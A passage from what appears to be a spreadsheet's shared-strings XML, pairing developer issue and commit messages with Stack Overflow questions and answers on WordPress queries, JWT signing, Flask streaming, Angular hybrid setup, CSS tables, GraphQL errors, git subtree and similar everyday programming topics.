'menu_order' is not available for posts.  That is allocated for hierarchical post types, such as pages.  You set that field in the Page Order UI, which is not available (by default) to posts.
Here is the revised code:
$args  = array(
	'post_type'      =&gt; 'post',
	'posts_per_page' =&gt; 1,
	'cat'            =&gt; 14,
	'post__not_in'   =&gt; array( 71, 1 ),
	'orderby'        =&gt; 'date',
	'order'          =&gt; 'ASC',
	'post_status'    =&gt; 'publish',
);
$the_query = new WP_Query( $args );
if ( ! $the_query-&gt;have_posts() ) {
	// maybe echo a message that none were found
	return;
}
while( $the_query-&gt;have_posts() ) {
	$the_query-&gt;the_post();
	// do your business logic here
	// then call the view file to render the HTML
}
wp_reset_postdata();
The SQL query then becomes:
SELECT SQL_CALC_FOUND_ROWS wp_posts.ID 
FROM wp_posts  
LEFT JOIN wp_term_relationships ON (wp_posts.ID = wp_term_relationships.object_id) 
WHERE 1=1  AND wp_posts.ID NOT IN (71,1) AND 
           ( wp_term_relationships.term_taxonomy_id IN (14) ) AND 
			wp_posts.post_type = 'post' AND 
			((wp_posts.post_status = 'publish'))
GROUP BY wp_posts.ID 
ORDER BY wp_posts.post_date ASC LIMIT 0, 1</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Background: Switched from pip to poetry and I am trying to utilize an existing virtual environment by running poetry shell. I am currently on a Windows machine.&lt;/p&gt;
&lt;p&gt;When I try to install the poetry shell plugin using &lt;code&gt;poetry self add poetry-plugin-shell&lt;/code&gt;, the installation hangs (i.e., does not proceed at all and I have to kill the terminal window) when trying to install &lt;code&gt;ptyprocess&lt;/code&gt;. I am trying to globally install via the terminal and not in my project directory. Could this be the source of my issue? I have attempted the installation of the plugin several times with no success. I have been able to install other dependencies/packages.&lt;/p&gt;
&lt;p&gt;Any guidance in the right direction would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C45</t>
  </si>
  <si>
    <t xml:space="preserve"> Login authentication works perfectly, success alert if login credentials correct, otherwise error alert is shown
* Fixed Jason web token issue with not receiving plain object - added toJSON() to user mongoose object for jwt.sign(user.toJSON())
    * https://stackoverflow.com/questions/47117709/payload-error-in-jsonwebtoken</t>
  </si>
  <si>
    <t>It fails at the line
const token = jwt.sign(user, config.secret, {
With error "Expected "payload" to be a plain object"
Your user object is initialized here:
User.getUserByUsername(username, (err, user)
Which I assume is mongoosejs object, which contains many methods and is not "serializable". You could handle this by passing a plain object, by either using .lean() from mongoose or plain toJSON method:
const token = jwt.sign(user.toJSON(), config.secret, {
  expiresIn: 604800 // 1 week
});</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use Spring Boot 3, Spring Batch and micrometer for tracing. &lt;br /&gt;
I would like the trace id to be the same across all the parent and child flows and steps. &lt;br /&gt;
So I would like to propagate the context across the spring batch &lt;code&gt;SimpleAsyncTaskExecutor&lt;/code&gt; tasks for distributed tracing by micrometer.&lt;/p&gt;
&lt;p&gt;In my case, the main flow splits into parallel flow and back to main flow. I noticed the steps in the main flow have the same trace id, but the parallel flows have a different trace id.&lt;/p&gt;
&lt;p&gt;Please advise. &lt;br /&gt;
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C450</t>
  </si>
  <si>
    <t>switch pool and deco calls to executor
We've consistently had problems doing parallel processing with a request context. The jobs just die on the production container :-(
Let's try out a different solution - flask-executor. This seems like a more specific solution for precisely what we hope to do.
Trying to get help here: https://stackoverflow.com/questions/57011066/parallel-execution-within-a-flask-response-context</t>
  </si>
  <si>
    <t>I'm trying to stream some data back to the user as a CSV in Flask, but need to get some extra info for each row.  This means I'm in the `Response` and want to call a method for each row in parallel.
Here's some pseudo-code to describe the situation:
```python
def endpoint:
    return Response(stream_data_by_page(arguments), mimetype='text/csv; charset=utf-8', headers=headers)
def row_worker(id):
    extra_info = get_more_info(id)
    return {'id': id, 'info': extra_info}
def stream_data_by_page(arguments):
    rows = get_data_page(arguments)
    # now add data to each row from another call
    with concurrent.futures.ProcessPoolExecutor() as executor:
        jobs = [row['id'] for row in rows]
        job_results = executor.map(row_worker, jobs)
        results_lookup = {j['id']:j['info'] for j in job_results}
    for row in rows:
        yield ','.join(row + results_lookup[row['id']]) + '\n'
```
This works locally, but dies within my Dokku container on the server.  I tried this with `Process.pool`, `concurrent.futures.ProcessPoolExecutor`, and `Flask-Executor`. All produced the same failure (the process in my container just dies).
It works fine if I don't try to stream it (ie. if I make the parallel call inside the endpoint rather than in the Response), but streaming it really helps the user experience.
Any tips on how to approach this?</t>
  </si>
  <si>
    <t xml:space="preserve">I just came across the following sentence:
  As the industry has moved from a three
  tier model to n-tier models, the object relational impedance mismatch has become more prevalent.
But I can't find a concise explanation of the difference between three tier and n-tier. I know what three tier is, and I assume n-tier just adds one or more tiers. I'm just not sure what these additional tiers would be. If anyone has a short explanation or simply a good link, that would be much appreciated.
</t>
  </si>
  <si>
    <t>C451</t>
  </si>
  <si>
    <t>Merge this project with the AngularJS Client pages. This should be an Angular10 app which contains an AngularJS app instead of the other way round.
AngularJS component design inside Angular App
Create link for getting hybrid setup:
https://stackoverflow.com/questions/49614691/error-when-using-angularjs-component-inside-angular-app-error-trying-to-get-t</t>
  </si>
  <si>
    <t>I faced the same issue, and finally solved it. There are some steps to follow before bootstrap an hybrid Angular/angularjs application.
Install the UpgradeModule
npm install @angular/upgrade
Wrap your "CompanyModule" (the module where all your company components are registered) into a new angularjs module (for instance: Ng1Shared). If you not have a module for your company components, it must be created. Than downgrade AppComponent as shown below.
const MyCompanyModule = angular
   .module('MyCompanyModule', [])
   .component('myComponent', MyComponent)
   .name;
const Ng1Shared = angular
   .module('Ng1Shared', [MyCompanyModule])
   .directive('appRoot', downgradeComponent({ component: AppComponent }))
   .name;
Configure AppModule with basic imports (BrowserModule, CommonModule, UpgradeModule). Provide the angularjs' Injector to Angular; declare an "entryComponent" and remove the default bootstrap for AppComponent.
@NgModule({
  imports: [BrowserModule, CommonModule, UpgradeModule], 
  declarations: [AppComponent], 
  providers: [{provide: '$scope', useExisting: '$rootScope'}], // REQUIRED
  entryComponents: [AppComponent], // ADD AN ENTRY COMPONENT 
  // bootstrap: [AppComponent] MUST BE REMOVED
})
Set angularjs globally with a function provided by UpgradeModule itself and manually bootstrap Angular with DoBootstrap method provided by @angular/core.
export class AppModule implements DoBootstrap { 
  constructor(private upgrade: UpgradeModule) { }
  public ngDoBootstrap(app: any): void {
    setAngularJSGlobal(angular);
    this.upgrade.bootstrap(document.body, [Ng1Shared], { strictDi: false });
    app.bootstrap(AppComponent);
  }
}
Create a wrapper directive for every angularjs component and add it to AppModule's declaration array.
@Directive({
    selector: 'my-component'
})
export class MyComponentWrapper extends UpgradeComponent {
    @Input() title: string;
    constructor(elementRef: ElementRef, injector: Injector) {
      super('myComponent', elementRef, injector);
    }
}
I wrote a simple
example available on stackblitz
. 
For example purposes I added angularjs MyCompanyModule to another angularjs module, called Ng1Module. As you can see also property binding between angularjs and angular component works fine.
I hope it can be useful.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been setting up some automation my address list systems in Outlook and have been adding contacts to an address list given its moved to a certain folder.&lt;/p&gt;
&lt;p&gt;I have the code working fine but I have no idea how to avoid it from adding duplicate contacts without searching through the address list. I feel like it has to be possible since trying to add a duplicate contact manually provides a pop up warning with the option of updating or adding a new one.&lt;/p&gt;
&lt;p&gt;I looked through the microsoft docs on address entries and through google and found absolutely nothing.&lt;/p&gt;
&lt;p&gt;Does anyone have a solution, because while I know how I would go about searching through the address list to avoid creating duplicates, that seems extremely inefficient if there is already a built in outlook function for when you try to add a duplicate contact.&lt;/p&gt;
&lt;p&gt;Example of my code for context minus my account:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Set oLookName = Application.GetNamespace(Type:=&amp;quot;MAPI&amp;quot;)
Set freshContacts = oLookName.AddressLists(&amp;quot;Fresh Contacts&amp;quot;)
Set nathanOrganisedFolders = oLookName.Folders(&amp;quot;my account&amp;quot;)
'goes through each email in the 'Cold Emails' folder to add the email addresses to the 'Fresh 
Contacts' address list
For Each emailItem In nathanOrganisedFolders.Folders(&amp;quot;Cold Emails&amp;quot;).Items
    newEmailAddress = emailItem.To
    Set emailRecipient = oLookName.CreateRecipient(newEmailAddress)
    emailRecipient.Resolve
    'adds a contact card with the domain as the name for the contact
    freshContacts.AddressEntries.Add Type:=&amp;quot;SMTP&amp;quot;, Name:=Right(emailRecipient.Address, 
    Len(emailRecipient.Address) - InStr(1, emailRecipient.Address, &amp;quot;@&amp;quot;)), 
    Address:=emailRecipient.Address
Next
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C452</t>
  </si>
  <si>
    <t>Decoupling web projects
Nothing to look at right now, just organizing some thoughts I have floating around.
OWID tech at the moment is very centralized and about scaling a standard pattern of articles and visualizations. This is effective, but especially as we attract more fun developers and designers, it would be cool to also be able to do some really good once-off creative web projects like Nadieh Bremer or Nicky Case do. I'm particularly thinking of Parable of the Polygons: https://ncase.me/polygons/
How would we actually build those and attach them to the domain? Some considerations:
Netlify has a mechanism for proxying one netlify project on a path to another: https://stackoverflow.com/a/48604942/1983739 This is how the grapher works right now. We could also use it for independent subprojects.
The very old header navigation on the site wouldn't work for such subprojects, since you need to rebake it for every new entry and that couples everything together. If we wanted to have a similar kind of navigation that is compatible we could do it with some JS that grabs an independent list of the entries.
There's no way to really build upon the grapher tech for custom projects right now. That would be one motivation for separating out the frontend as its own library.</t>
  </si>
  <si>
    <t>Add a _redirects file in the the main repo containing this:
/dissertation/* https://wjakethompson-dissertation.netlify.com/:splat 200
This tells Netlify to proxy requests through to the other repo. You will however need to ensure that any urls used in the dissertation repo are correctly relative to this path, which may be easy or may be very hard depending on the build system.
The subdomain alternative is simpler and you don't need to do anything special. Just follow the custom domain setup using dissertation.wjakethompson.com and it should work fine.
https://www.netlify.com/docs/custom-domains/
The subdomain and main domain do need to correspond to projects on the same Netlify account.</t>
  </si>
  <si>
    <t xml:space="preserve">I am starting to put together a system architecture document for a new project at my company. Basically we have a rather large business layer that follows the enterprise library data pattern, and i will need to access these data objects from a new silverlight application.
My question is what is the best way to gain access to these objects in silverlight? My initial idea is using WCF, but i am unsure of how to best to reconstruct the objects in the client. 
</t>
  </si>
  <si>
    <t>C453</t>
  </si>
  <si>
    <t>Client and server communication 
Currently images are not sanitized before being displayed on the website. The following steps should happen before displaying an image:
Check if URL matches API host (i.e. staging.ecosounds)
Validate image: https://stackoverflow.com/questions/18837735/check-if-image-exists-on-server-using-javascript
This can be automated by creating @BawImage and @BawImages decorators for models</t>
  </si>
  <si>
    <t>You could use something like:
function imageExists(image_url){
    var http = new XMLHttpRequest();
    http.open('HEAD', image_url, false);
    http.send();
    return http.status != 404;
}
Obviously you could use jQuery/similar to perform your HTTP request.
$.get(image_url)
    .done(function() { 
        // Do something now you know the image exists.
    }).fail(function() { 
        // Image doesn't exist - do something else.
    })</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The below FastAPI application is supposed to send a Bearer token over to an external api, but I keep on getting 401 unauthorized. My first suspicion was that the actual token retrieved from the /token endpoint was coming empty or malformed, but it is not.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from fastapi import FastAPI
import httpx
app = FastAPI()
@app.get('/query')
async def getToken():
    async with httpx.AsyncClient(verify=False) as client:
        response = await client.get('https://myTokenApi.com/token')
        access_token = response.json().get(&amp;quot;access_token&amp;quot;)
        print(response.text)
        try:
            email = &amp;quot;myEmail@provider.com&amp;quot;
            response_api = await client.get(f&amp;quot;https://externalApi.com/email/{email}&amp;quot;, headers={&amp;quot;Content-Type&amp;quot;:&amp;quot;application/json&amp;quot;, &amp;quot;Authorization&amp;quot;: f&amp;quot;Bearer {access_token}&amp;quot;})
            print(response_api.status_code, response_api.text)
            print(response_api.raise_for_status())
        except httpx.HTTPStatusError as e:
            print(e)
        return response_api.json()
if __name__ == '__main__':
    import uvicorn
    uvicorn.run(&amp;quot;main:app&amp;quot;, host=&amp;quot;0.0.0.0&amp;quot;, port=3000, log_level=&amp;quot;info&amp;quot;, reload=True)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can properly test it with insomnia or postman and both api's are responding just fine.
I have also tried grabbing just access_token from the json being returned, to make sure i'm sending the right piece, but I still have an error:&lt;/p&gt;
&lt;p&gt;An exception is raised saying this is not a valid JSON, but printing out all the stuff, it looks valid:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
returned JSON {'access_token': 'xxxxxxxxxxxxxxxxxxxxxxSomething', 'expires_in': 3600, 'token_type': 'Bearer'}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The mentioned exception is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  raise JSONDecodeError(&amp;quot;Expecting value&amp;quot;, s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C454</t>
  </si>
  <si>
    <t>Moving database credentials to safer place
One way of doing things would be to get credentials via env vars.
Check this : https://stackoverflow.com/questions/17324472/how-to-securely-store-database-password-in-python</t>
  </si>
  <si>
    <t>Well, one way of doing this is putting the passwords in a separate config/ini file that is
not
deployed with the project. And then, pass the path of this file to the main entry of the application, e.g.:
python main.py --config=/path/to/config.ini
Note that you'll need to parse this
--config
argument (see
argparse
) and then read and parse the
config.ini
file.
Update
:
Since you mentioned web applications, there is also another way of passing configuration information - through the
environ
. For example, if you use
mod_wsgi
, you can putt this in the wsgi directives:
SetEnv my_namespace.some_param some_value
And then, this value will be accessible in the application with through
os.environ
:
import os
os.environ['my_namespace.some_param']</t>
  </si>
  <si>
    <t xml:space="preserve">Duplicate:
[external-link]
We are developing an enterprise application which uses client-server architecture. It is based on .NET Framework 3.5, the client is a rich WinFom application and the entire system is in Beta testing stage. We need to exposed some of this system's functionality through web. The current desktop client application, makes minimum amount of calls to the server but it has relatively medium to high amount of data transfer.
Currently the basic idea is to create a front-end layer for our system, using ASP.NET Web Forms or ASP.NET MVC. We don't have much experience with ASP.NET MVC but this technology seems very interesting and promising (at least for me).
My Questions are:
What considerations do you make when
choosing a web development
technology?
What may you choose for such a
scenario, Web Forms or MVC?
</t>
  </si>
  <si>
    <t>C455</t>
  </si>
  <si>
    <t>[CALCITE-3386] CyclicMetadataException singleton instance causes confusion when debugging (Zuozhi Wang)
Fix misleading stack trace of Calcite's cyclic meta exception. Previously, a
singleton instance of CyclicMetadataException is reused. However it will lead
to wrong stack trace.
See https://stackoverflow.com/questions/15090664</t>
  </si>
  <si>
    <t xml:space="preserve">It depends on your definition of "safe." The exception will give a misleading stack trace, which I wouldn't call "safe". Consider:
public class ThrowTest {
    private static Exception e = new Exception("t1"); // Line 2
    public static final void main(String[] args) {
        ThrowTest tt;
        tt = new ThrowTest();
        try {
            tt.t1();
        }
        catch (Exception ex) {
            System.out.println("t1:");
            ex.printStackTrace(System.out);
        }
        try {
            tt.t2();                                  // Line 16
        }
        catch (Exception ex) {
            System.out.println("t2:");
            ex.printStackTrace(System.out);
        }
    }
    private void t1() 
    throws Exception {
        throw this.e;
    }
    private void t2() 
    throws Exception {
        throw new Exception("t2");                    // Line 31
    }
}
That has this output:
Note how the t1 method is completely missing from the stack trace in the first test case. There's no useful context information at all.
Now, you can use fillInStackTrace to fill in that information just before the throw:
this.e.fillInStackTrace();
throw this.e;
...but that's just making work for yourself (work you will forget sometimes). There's simply no benefit to it at all. And not all exceptions allow you to do it (some exceptions make the stack trace read-only).
You've said elsewhere in the comments that this is to avoid "code duplication." You're much better off having an exception builder function:
private IllegalStateException buildISE() {
    return new IllegalStateException("le sophisticated way");
}
(Could be static final if you like.)
And then throwing it like this:
throw buildISE();
That avoids code duplication without misleading stack traces and unnecessary Exception instances.
Here's what that looks like applied to the above:
public class ThrowTest {
    public static final void main(String[] args) {
        ThrowTest tt;
        tt = new ThrowTest();
        try {
            tt.t1();                                   // Line 8
        }
        catch (Exception ex) {
            System.out.println("t1:");
            ex.printStackTrace(System.out);
        }
        try {
            tt.t2();                                   // Line 15
        }
        catch (Exception ex) {
            System.out.println("t2:");
            ex.printStackTrace(System.out);
        }
    }
    private static final Exception buildEx() {
        return new Exception("t1");                    // Line 24
    }
    private void t1() 
    throws Exception {
        throw buildEx();                               // Line 29
    }
    private void t2() 
    throws Exception {
        throw new Exception("t2");                     // Line 34
    }
}
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a series of animations which ends with text and image being animated upwards(think of starwars narrative). when the animation is complete however, I am able to keep scrolling down the page to other content but i cannot scroll back up to reread the text which will be necessary. can anyone help provide a solution? here is my script.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//PAGE TITLE FADE+SCROLL ANIMATION
document.addEventListener(&amp;quot;DOMContentLoaded&amp;quot;, function () {
    const title = document.querySelector(&amp;quot;.pagetitle&amp;quot;);
    const text = document.querySelector(&amp;quot;.text&amp;quot;);
    const heroImage = document.querySelector(&amp;quot;.hero&amp;quot;);
    title.style.opacity = &amp;quot;1&amp;quot;;
    text.style.opacity = &amp;quot;0&amp;quot;;
    heroImage.style.transform = &amp;quot;translateY(0)&amp;quot;;
    text.style.transform = &amp;quot;translateY(0)&amp;quot;;
    setTimeout(() =&amp;gt; {
        title.style.opacity = &amp;quot;0&amp;quot;;
    }, 2000);
    setTimeout(() =&amp;gt; {
        text.style.opacity = &amp;quot;1&amp;quot;;
        text.style.transition = &amp;quot;opacity 1.5s ease-in-out&amp;quot;;
    }, 2500);
    setTimeout(() =&amp;gt; {
        const textBottomOffset = text.getBoundingClientRect().bottom;
        const windowHeight = window.innerHeight;
        const distanceToMove = textBottomOffset - windowHeight;
        heroImage.style.transition = &amp;quot;transform 3s ease-in-out&amp;quot;;
        text.style.transition = &amp;quot;transform 3s ease-in-out&amp;quot;;
        heroImage.style.transform = `translateY(-${distanceToMove}px)`;
        text.style.transform = `translateY(-${distanceToMove}px)`;
        // Enable scrolling after animation finishes
        setTimeout(() =&amp;gt; {
            document.body.style.overflow = &amp;quot;auto&amp;quot;;
        }, 3000);
    }, 4000);
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried changing the css positioning as well as animation using both transform and manipulating the whole page scroll positioning without success. I tried using CHATGPT which was no help. I'm sure the solution is some simple activation but I am very inexperienced with javascript.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C456</t>
  </si>
  <si>
    <t>Theming Architecture 
Retaining the flexibility to set a theme on an individual component
I think this is pretty much how we want to do theming:
https://stackoverflow.com/questions/52624110/can-stenciljs-component-use-external-theming?answertab=votes#tab-top</t>
  </si>
  <si>
    <t>At the bottom of the Styling docs there is a section about how to use CSS variables:
In this example we have defined a CSS Variable called --app-primary-color that is set to the color #488aff. The :root selector in this example is a CSS pseudo selector that defines the variable on the root element of your project (usually &lt;html&gt;) so that the variable can be used across your app.
So if you have a button component like this:
@Component({ tag: 'my-button', styleUrl: 'button.css' })
export class Button {
  render() {
    return &lt;div class="button"&gt;&lt;slot /&gt;&lt;/div&gt;;
  }
}
And the following button.css for it:
.button {
  background: var(--primary-color, tomato);
  color: var(--light-color, white);
  display: block;
  padding: 1em 2em;
  border-radius: 0.2em;
  font-family: sans-serif;
  text-align: center;
  text-transform: uppercase;
}
Then you can overwrite all button colors by setting the variable somewhere in your CSS:
:root {
  --primary-color: mediumseagreen;
}
CSS Variables can also be set using Javascript, and they are even polyfilled by Stencil for older browsers.
JSFiddle example: http://jsfiddle.net/5fv9r6e1/
Btw, in your component decorator you can also set shadow: true to enable Shadow DOM, and then you can use the :host selector and don't need the wrapping div in this example:
@Component({ tag: 'my-button', styleUrl: 'button.css', shadow: true })
export class Button {
  render() {
    return &lt;slot /&gt;;
  }
}
css:
:host {
  background: var(--primary-color, tomato);
  color: var(--light-color, white);
  display: block;
  padding: 1em 2em;
  border-radius: 0.2em;
  font-family: sans-serif;
  text-align: center;
  text-transform: uppercase;
}
Ionic 4 uses this concept a lot, so it might be worth having a look at their Stencil components: https://github.com/ionic-team/ionic/tree/master/core/src/components</t>
  </si>
  <si>
    <t xml:space="preserve">I want to use SubSonic (2.2) in an application I'm building because I like its simplicity and it handles any type of query I can foresee needing. At the same time, I want to keep the upper layers of my application de-coupled from the Subsonic Types. I want to return just Plain Old C# Objects and also pass in POCOs to be saved.
But here's the catch: I want my POCOs to have Lazy loaded properties for Child collections and parent objects based upon the FK relationships. I figure I need to somehow put a Subsonic SqlQuery object in a private member on my POCO and use that internally in the getter for a lazy loaded property.
Any ideas about how to implement this specifically with SubSonic? Anyone done this before?
I do realize that the next major release of SubSonic will do this out-of-box, but that looks to be atleast a few months away.
</t>
  </si>
  <si>
    <t>C457</t>
  </si>
  <si>
    <t>Div Class table overflow their boundaries 
This happens all over our interface. Let's use this solution:
https://stackoverflow.com/questions/24963291/table-overflows-parent-div-when-td-content-is-too-wide</t>
  </si>
  <si>
    <t>Same answer as another very recent topic:table-layout:fixed; + width. DEMO
table {
    table-layout:fixed;
    width:100%;
}
td {
    border: 1px solid black;
    overflow:hidden;/* optionnal*/
}
#firsttd {
    white-space: nowrap;
}
edit : about comment below :
@MatthieuRiegler
table-layout:fixed; is bad if you want cell with different width.
This is your own opinion without any explanation
here is a demo where table-layout and cell's width can be different:
table {
  width: 100%;
  table-layout: fixed;
}
table,
td,
th {
  border: 1px solid;
}
thead tr th:nth-child(1) {
  width: 5em;
}
thead tr th:nth-child(2) {
  width: 20%;
}
thead tr th:nth-child(3) {
  width: 7.5em;
}
&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;Head Cell&lt;/th&gt;
      &lt;th&gt;Head Cell&lt;/th&gt;
      &lt;th&gt;Head Cell&lt;/th&gt;
      &lt;th&gt;Head Cell&lt;/th&gt;
      &lt;th&gt;Head-Cell-Text&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
width + table-layout:fixed might just be a bad idea if no responsiveness is thought aside.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Javascript has &lt;code&gt;Object.seal()&lt;/code&gt; to prevent any extensions to an object (and &lt;code&gt;Object.freeze()&lt;/code&gt; to completely freeze it). But it also has &lt;code&gt;Object.preventExtensions()&lt;/code&gt; that seems to do the same job as &lt;code&gt;Object.seal()&lt;/code&gt;, aside from some &lt;a href="https://tc39.es/ecma262/multipage/fundamental-objects.html#sec-object.preventextensions" rel="nofollow noreferrer"&gt;really&lt;/a&gt; &lt;a href="https://tc39.es/ecma262/multipage/fundamental-objects.html#sec-object.seal" rel="nofollow noreferrer"&gt;small&lt;/a&gt; implementation differences.&lt;/p&gt;
&lt;p&gt;In what situations would I want/need to use &lt;code&gt;Object.preventExtensions()&lt;/code&gt; rather than &lt;code&gt;Object.seal()&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C458</t>
  </si>
  <si>
    <t>GraphQL class design issue 
I believe some of the exceptions we are throwing are a bit heavy handed. I think in some instances we need to return some warning data, but still run the query. The convo in the slack channel actually got me thinking about this.
For instance; if someone queries for 200 posts, and the limit is still set to 100, ideally I think we should return the 100 posts, but also return a warning that says what was requested was over the hard limit.
I think the response data could look something like the following:
{
  "warnings": [
    {
        "message": "Too many posts queried, we've limited the results to the maximum number allowed...",
        "locations": [
        {
          "line": 10,
          "column":10,
        }
        ]
  ],
  "data": {
    "posts": {
      "edges": [
        {
          "node": {
            "id": "cG9zdDo0MTg="
          }
        },
        {
          "node": {
            "id": "cG9zdDo0MTc="
          }
        }
      ]
    }
  }
}
I think adding varying degrees of exceptions as a whole will be good for the codebase, and would allow us to give good debugging info without bombing out an app. Could also be good data for an optics like product that tracks all of the GraphQL queries.
The top answer here kinda does what I'm suggesting. Captures "errors" within the resolver, allows the database edit to partly go through and return errors for what didn't go through. https://stackoverflow.com/questions/32662437/graphql-and-form-validation-errors</t>
  </si>
  <si>
    <t>With validation logic inside the resolve method, you have complete control over the generated user errors. Here is an example:
// data/mutations/createUser.js
import {
  GraphQLObjectType as ObjectType,
  GraphQLNonNull as NonNull,
  GraphQLList as List,
  GraphQLString as StringType
} from 'graphql';
import validator from 'validator';
import UserType from '../types/UserType';
export default {
  type: new ObjectType({
    name: 'CreateUserResult',
    fields: {
      user: { type: UserType },
      errors: { type: new NonNull(new List(StringType)) }
    }
  }),
  args: {
    email: { type: new NonNull(StringType) },
    password: { type: new NonNull(StringType) }
  },
  resolve(_, { email, password }) {
    let user = null;
    let errors = [];
    if (validator.isNull(email)) {
      errors.push(...['email', 'The email filed must not be empty.']);
    } else if (!validator.isLength(email, { max: 100})) {
      errors.push(...['email', 'The email must be at a max 100 characters long.']);
    }
    // etc.
    return { user, errors };
  }
};
See my blog post on this subject - Validation and User Errors in GraphQL Mutations
Alternatively, create type UserErrorType { key: String!, message: String! } that can be used instead of plain strings when you compile the list of user errors to be returned to the caller.
GraphQL Query
mutation {
  createUser(email: "hello@tarkus.me", password: "Passw0rd") {
    user { id, email },
    errors { key, message }
  }
}
Query Response
{
  data: {
    user: null,
    errors: [
      { key: '', message: 'Failed to create a new user account.' },
      { key: 'email', message: 'User with this email already exists.' }
    ]
  }
}</t>
  </si>
  <si>
    <t xml:space="preserve">This is going to be a generic question.
I am struggling in designing a GUI application, esp. with dealing with interactions between different parts.
I don't know how I should deal with shared state. On one hand, shared state is bad, and things should be as explicit as possible. On the other hand, not having shared state introduces unwanted coupling between components.
An example:
I want my application to be extendable in an Emacs/Vim sort of way, via scripts. Clearly, some sort of shared state needs to be modified, so that the GUI will use it. My initial plan was having a global "session" that is accessible from everywhere, but I'm not so sure about it.
One tricky use case is key bindings. I want the user to be able to specify custom keybindings from a script. Each keybinding maps to an arbitrary command, that receives the session as the only argument.
Now, the editor component captures keypresses. It has to have access to the keymappings, which are per-session, so it needs access to the session. Is coupling the editor to the session a good idea? Other components will also need to access the keybindings, so the session now becomes shared and can be a singleton...
Is there any good reading about designing GUI applications that goes beyond MVC?
This is Python and wxPython, FWIW.
[EDIT]: Added concrete usecase.
</t>
  </si>
  <si>
    <t>C459</t>
  </si>
  <si>
    <t>Move map matching modules into this repository
Stumbling  over the necessity to add map matching as dependency and Moving map matching modules into this repositor
There are several approaches to retain the source code history of the map-matching repository: http://stackoverflow.com/questions/1425892/how-do-you-merge-two-git-repositories
The soution suggested in answer 3 using git merge --allow-unrelated-histories seems most promising to mee.</t>
  </si>
  <si>
    <t>A single branch of another repository can be easily placed under a subdirectory retaining its history. For example:
git subtree add --prefix=rails git://github.com/rails/rails.git master
This will appear as a single commit where all files of Rails master branch are added into "rails" directory.
However the commit's title contains a reference to the old history tree:
Add 'rails/' from commit
&lt;rev&gt;
Where
&lt;rev&gt;
is a SHA-1 commit hash. You can still see the history, blame some changes.
git log &lt;rev&gt;
git blame &lt;rev&gt; -- README.md
Note that you can't see the directory prefix from here since this is an actual old branch left intact.
You should treat this like a usual file move commit: you will need an extra jump when reaching it.
# finishes with all files added at once commit
git log rails/README.md
# then continue from original tree
git log &lt;rev&gt; -- README.md
There are more complex solutions like doing this manually or rewriting the history as described in other answers.
The git-subtree command is a part of official git-contrib, some packet managers install it by default (OS X Homebrew).
But you might have to install it by yourself in addition to git.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a bare minimum Bicep file to create an &lt;strong&gt;EMPTY&lt;/strong&gt; Python 3.11 Function App in Azure via Infrastructure as Code (IaC). I do not want App Insights support. I should be able to deploy to a preexisting resource group named rg-py-func-tst via this one line command:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;az deployment group create --resource-group rg-py-func-tst --template-file main.bicep
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've looked at samples on Git, tried exporting templates directly out of Azure, and even briefly attempted to use Azure Resource Manager (ARM) templates. Through all of that, this Bicep seems most reasonable to me:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;// Created by Microsoft Copilot and Google Gemini
// This Bicep script deploys an EMPTY Python 3.11 Function App named
// 'shawnopyFuncTest' without App Insights, at service level Y1. 
// It creates a storage account named 'pyfunctest100', an app service
// plan named 'pyfunctestAppService', and the function app itself.
//
// I do not have the Python code yet. The Python code will be
